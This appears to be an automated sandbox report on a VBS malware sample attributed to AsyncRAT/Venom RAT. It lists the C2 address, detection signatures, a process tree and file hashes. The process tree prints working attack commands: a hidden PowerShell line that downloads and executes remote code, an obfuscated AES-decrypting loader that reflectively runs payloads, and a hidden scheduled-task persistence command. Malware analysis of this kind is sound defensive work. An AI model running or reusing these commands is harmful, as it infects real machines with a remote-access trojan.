Overview

overview

10

Static

static

1

799e3743d0...be.vbs

windows7-x64

8

799e3743d0...be.vbs

windows10-2004-x64

10

Analysis

  • max time kernel
    148s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    13-12-2024 02:38

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    799e3743d0666a4d0def179260537e1711456f39949cc672ba356d15bca9c0be.vbs

  • Size

    78KB

  • MD5

    f4360392014f0bebc78d81bbf8b1bfec

  • SHA1

    275ddf9b03cc98e1f0d599140e19c64d5a941fd9

  • SHA256

    799e3743d0666a4d0def179260537e1711456f39949cc672ba356d15bca9c0be

  • SHA512

    bfeded4bf8bd4e82226ec0b3b3abb7dfd9d328ce1216004bdd47bf997f3058a8cf8a5973ef4e01979dbfdb71cc2c9f73a731f70e58eec2106208d7dc08000a79

  • SSDEEP

    1536:xO6AlDEJYMg1Z0BYBOMadTFA63RI3xMpFgLTljdKCHBlok:kblQJYZ1Z2YBLT2mSpFg6iEk

Score
10/10
asyncratdec2024executionpersistencerat

Malware Config

Extracted

Family

asyncrat

Version

Venom RAT + HVNC + Stealer + Grabber v6.0.3

Botnet

Dec2024

C2

45.88.88.7:6845

Mutex

zmkdvkzgwmnzhgvxwwk

Attributes
  • delay

    1

  • install

    false

  • install_folder

    %AppData%

aes.plain

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

    ratasyncrat
  • Asyncrat family
    asyncrat
  • Async RAT payload 1 IoCs
    rat
  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Run Powershell and hide display window.

    execution
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 11 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 18 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\799e3743d0666a4d0def179260537e1711456f39949cc672ba356d15bca9c0be.vbs"
    1⤵
    • Checks computer location settings
    • Adds Run key to start application
    • Suspicious use of WriteProcessMemory
    PID:1168
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -Command "iex (iwr -Uri https://emptyservices.xyz/vbs.txt -UseBasicParsing -Headers @{ 'Authorization' = 'your_fixed_token_here' })"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1140
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\system.bat" "
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:808
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7YiAJ5/sPelca+hTcek78jxnU9ioiOBmM7qe4UB010A='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('K5VNkdetZe//Td3nkfB/hw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $zGnmY=New-Object System.IO.MemoryStream(,$param_var); $gcYTH=New-Object System.IO.MemoryStream; $twAan=New-Object System.IO.Compression.GZipStream($zGnmY, [IO.Compression.CompressionMode]::Decompress); $twAan.CopyTo($gcYTH); $twAan.Dispose(); $zGnmY.Dispose(); $gcYTH.Dispose(); $gcYTH.ToArray();}function execute_function($param_var,$param2_var){ $nREcc=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $hmWZi=$nREcc.EntryPoint; $hmWZi.Invoke($null, $param2_var);}$BBtPh = 'C:\Users\Admin\AppData\Local\Temp\system.bat';$host.UI.RawUI.WindowTitle = $BBtPh;$VJQrS=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($BBtPh).Split([Environment]::NewLine);foreach ($EvXNX in $VJQrS) { if ($EvXNX.StartsWith('jVPqiiWHWVTrLedMZeIO')) { $Qjyhd=$EvXNX.Substring(20); break; }}$payloads_var=[string[]]$Qjyhd.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
        3⤵
          PID:3108
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Modifies registry class
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:3476
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'Windows_Log_541_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Windows_Log_541.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
            4⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:3492
          • C:\Windows\System32\WScript.exe
            "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Windows_Log_541.vbs"
            4⤵
            • Checks computer location settings
            • Suspicious use of WriteProcessMemory
            PID:4764
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Windows_Log_541.bat" "
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:2892
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7YiAJ5/sPelca+hTcek78jxnU9ioiOBmM7qe4UB010A='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('K5VNkdetZe//Td3nkfB/hw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $zGnmY=New-Object System.IO.MemoryStream(,$param_var); $gcYTH=New-Object System.IO.MemoryStream; $twAan=New-Object System.IO.Compression.GZipStream($zGnmY, [IO.Compression.CompressionMode]::Decompress); $twAan.CopyTo($gcYTH); $twAan.Dispose(); $zGnmY.Dispose(); $gcYTH.Dispose(); $gcYTH.ToArray();}function execute_function($param_var,$param2_var){ $nREcc=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $hmWZi=$nREcc.EntryPoint; $hmWZi.Invoke($null, $param2_var);}$BBtPh = 'C:\Users\Admin\AppData\Roaming\Windows_Log_541.bat';$host.UI.RawUI.WindowTitle = $BBtPh;$VJQrS=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($BBtPh).Split([Environment]::NewLine);foreach ($EvXNX in $VJQrS) { if ($EvXNX.StartsWith('jVPqiiWHWVTrLedMZeIO')) { $Qjyhd=$EvXNX.Substring(20); break; }}$payloads_var=[string[]]$Qjyhd.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
                6⤵
                  PID:4720
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
                  6⤵
                  • Blocklisted process makes network request
                  • Command and Scripting Interpreter: PowerShell
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of SetWindowsHookEx
                  PID:3008

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
        Filesize

        2KB

        MD5

        2f57fde6b33e89a63cf0dfdd6e60a351

        SHA1

        445bf1b07223a04f8a159581a3d37d630273010f

        SHA256

        3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

        SHA512

        42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
        Filesize

        2KB

        MD5

        005bc2ef5a9d890fb2297be6a36f01c2

        SHA1

        0c52adee1316c54b0bfdc510c0963196e7ebb430

        SHA256

        342544f99b409fd415b305cb8c2212c3e1d95efc25e78f6bf8194e866ac45b5d

        SHA512

        f8aadbd743495d24d9476a5bb12c8f93ffb7b3cc8a8c8ecb49fd50411330c676c007da6a3d62258d5f13dd5dacc91b28c5577f7fbf53c090b52e802f5cc4ea22

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        1KB

        MD5

        b66db53846de4860ca72a3e59b38c544

        SHA1

        2202dc88e9cddea92df4f4e8d83930efd98c9c5a

        SHA256

        b1a00fcea37b39a5556eea46e50711f7713b72be077a73cb16515ca3538d6030

        SHA512

        72eff4ae1d541c4438d3cd85d2c1a8c933744b74c7a2a4830ffe398fee88f1a8c5b241d23e94bcdf43b4be28c2747b331a280a7dc67ab67d8e72c6569f016527

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4hwg3nkx.4dk.ps1
        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\system.bat
        Filesize

        69KB

        MD5

        67fdaf4f143ad3cdab6f3c542076b194

        SHA1

        8a7474470f2c47e3f301aef70da5ef415c38cff2

        SHA256

        f10e4792e78f14998d0334d5d35b5efa825581c917a80e6d8ee096ee714e0c7e

        SHA512

        64d68d7e8dbad526a2d4d09f4a3ba8b2a28a97a79123ad303c3aea39be8652fc2ad9fdc3f85ddbf68c0713e6186b8219774cd6c46cf90ac3f6a61711b62939e4

        Download Submit

      • C:\Users\Admin\AppData\Roaming\Windows_Log_541.vbs
        Filesize

        115B

        MD5

        5e310d83bca4e40f4a956dbd6ff842be

        SHA1

        8b54baa47e75d264b2ab9575748aafe43e354dd2

        SHA256

        b7489f5cf56db250f805c3c86a64703670cdef7b07c776de262868a673996e20

        SHA512

        4bb3c56d21d7f91d21a3ef7a318775b8ac1d57d46616f208333d0fecba15139bb4686cae66f234c7f4a1f1e383eeb0d31fd966e68db31584ab620f1366cfe096

        Download Submit

      • memory/1140-12-0x00007FF8BE390000-0x00007FF8BEE51000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/1140-16-0x00007FF8BE390000-0x00007FF8BEE51000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/1140-15-0x00007FF8BE390000-0x00007FF8BEE51000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/1140-0-0x00007FF8BE393000-0x00007FF8BE395000-memory.dmp

        Filesize

        8KB

        Download

      • memory/1140-11-0x00007FF8BE390000-0x00007FF8BEE51000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/1140-2-0x00000266F8B30000-0x00000266F8B52000-memory.dmp

        Filesize

        136KB

        Download

      • memory/3008-63-0x000002AA77DB0000-0x000002AA77DC8000-memory.dmp

        Filesize

        96KB

        Download

      • memory/3476-31-0x000001E5FFC40000-0x000001E5FFC84000-memory.dmp

        Filesize

        272KB

        Download

      • memory/3476-32-0x000001E5FFD10000-0x000001E5FFD86000-memory.dmp

        Filesize

        472KB

        Download

      • memory/3476-33-0x000001E59A150000-0x000001E59A158000-memory.dmp

        Filesize

        32KB

        Download

      • memory/3476-34-0x000001E59A160000-0x000001E59A172000-memory.dmp

        Filesize

        72KB

        Download